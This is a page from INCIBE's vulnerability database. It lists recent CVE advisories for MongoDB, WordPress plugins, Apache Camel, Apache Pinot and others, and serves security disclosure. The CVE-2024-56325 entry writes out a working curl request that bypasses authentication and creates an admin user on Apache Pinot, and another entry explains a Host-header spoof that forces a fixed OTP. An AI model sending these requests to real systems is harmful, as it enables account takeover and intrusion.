Vulnerabilities

With the aim of informing, warning and helping professionals with the latest security vulnerabilities in technology systems, we have made a database available for users interested in this information, which is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 registers, is based on the information from the NVD (National Vulnerability Database) – by virtue of a partnership agreement – through which INCIBE translates the included information into Spanish.

On occasions this list will show vulnerabilities that have still not been translated, as they are added while the INCIBE team is still carrying out the translation process. The CVE  (Common Vulnerabilities and Exposures) Standard for Information Security Vulnerability Names is used with the aim to support the exchange of information between different tools and databases.

All vulnerabilities collected are linked to different information sources, as well as available patches or solutions provided by manufacturers and developers. It is possible to carry out advanced searches, as there is the option to select different criteria to narrow down the results, some examples being vulnerability types, manufacturers and impact levels, among others.

Through RSS feeds or Newsletters we can be informed daily about the latest vulnerabilities added to the repository. Below there is a list, updated daily, where you can discover the latest vulnerabilities.

CVE-2025-1659

Publication date:
01/04/2025
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Read vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2025-3084

Publication date:
01/04/2025
When run on commands with certain arguments set, explain may fail to validate these arguments before using them. This can lead to crashes in router servers. This affects MongoDB Server v5.0 prior to 5.0.31, MongoDB Server v6.0 prior to 6.0.20, MongoDB Server v7.0 prior to 7.0.16 and MongoDB Server v8.0 prior to 8.0.4
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2025-3085

Publication date:
01/04/2025
A MongoDB server under specific conditions running on Linux with TLS and CRL revocation status checking enabled, fails to check the revocation status of the intermediate certificates in the peer&amp;#39;s certificate chain. In cases of MONGODB-X509, which is not enabled by default, this may lead to improper authentication. This issue may also affect intra-cluster authentication. This issue affects MongoDB Server v5.0 versions prior to 5.0.31, MongoDB Server v6.0 versions prior to 6.0.20, MongoDB Server v7.0 versions prior to 7.0.16 and MongoDB Server v8.0 versions prior to 8.0.4.<br /> Required Configuration : MongoDB Server must be running on Linux Operating Systems and CRL revocation status checking must be enabled
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2025-2237

Publication date:
01/04/2025
The WP RealEstate plugin for WordPress, used by the Homeo theme, is vulnerable to authentication bypass in all versions up to, and including, 1.6.26. This is due to insufficient role restrictions in the &amp;#39;process_register&amp;#39; function. This makes it possible for unauthenticated attackers to register an account with the Administrator role.
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2025-2906

Publication date:
01/04/2025
The Contempo Real Estate Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 3.6.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2025-30177

Publication date:
01/04/2025
Bypass/Injection vulnerability in Apache Camel in Camel-Undertow component under particular conditions.<br /> <br /> This issue affects Apache Camel: from 4.10.0 before 4.10.3, from 4.8.0 before 4.8.6.<br /> <br /> Users are recommended to upgrade to version 4.10.3 for 4.10.x LTS and 4.8.6 for 4.8.x LTS.<br /> <br /> Camel undertow component is vulnerable to Camel message header injection, in particular the custom header filter strategy used by the component only filter the "out" direction, while it doesn&amp;#39;t filter the "in" direction.<br /> <br /> <br /> This allows an attacker to include Camel specific headers that for some Camel components can alter the behaviour such as the camel-bean component, or the camel-exec component.
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2025-3083

Publication date:
01/04/2025
Specifically crafted MongoDB wire protocol messages can cause mongos to crash during command validation. This can occur without using an authenticated connection. This issue affects MongoDB v5.0 versions prior to 5.0.31,  MongoDB v6.0 versions prior to 6.0.20 and MongoDB v7.0 versions prior to 7.0.16
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2024-13553

Publication date:
01/04/2025
The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.7.9. This is due to the plugin using the Host header to determine if the plugin is in a playground environment. This makes it possible for unauthenticated attackers to spoof the Host header to make the OTP code "1234" and authenticate as any user, including administrators.
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2025-3082

Publication date:
01/04/2025
A user authorized to access a view may be able to alter the intended collation, allowing them to access to a different or unintended view of underlying data. This issue affects MongoDB Server v5.0 version prior to 5.0.31, MongoDB Server v6.0 version prior to 6.0.20, MongoDB Server v7.0 version prior to 7.0.14 and MongoDB Server v7.3 versions prior to 7.3.4.
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2025-27130

Publication date:
01/04/2025
Welcart e-Commerce 2.11.6 and earlier versions contains an untrusted data deserialization vulnerability. If this vulnerability is exploited, arbitrary code may be executed by a remote unauthenticated attacker who can access websites created using the product.
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2024-56325

Publication date:
01/04/2025
Authentication Bypass Issue<br /> <br /> If the path does not contain / and contain., authentication is not required.<br /> <br /> Expected Normal Request and Response Example<br /> <br /> curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users <br /> <br /> <br /> Return: {"code":401,"error":"HTTP 401 Unauthorized"}<br /> <br /> <br /> Malicious Request and Response Example <br /> <br /> curl -X POST -H "Content-Type: application/json" -d &amp;#39;{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}&amp;#39; http://{serverip}:9000/users; http://{serverip}:9000/users; .<br /> <br /> <br /> Return: {"users":{}}<br /> <br /> <br /> <br /> <br /> <br /> A new user gets added bypassing authentication, enabling the user to control Pinot.
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025

CVE-2025-2891

Publication date:
01/04/2025
The Real Estate 7 WordPress theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation via the &amp;#39;template-submit-listing.php&amp;#39; file in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with Seller-level access and above, to upload arbitrary files on the affected site&amp;#39;s server which may make remote code execution possible if front-end listing submission has been enabled.
Severity CVSS v4.0: Pending analysis
Last modification:
01/04/2025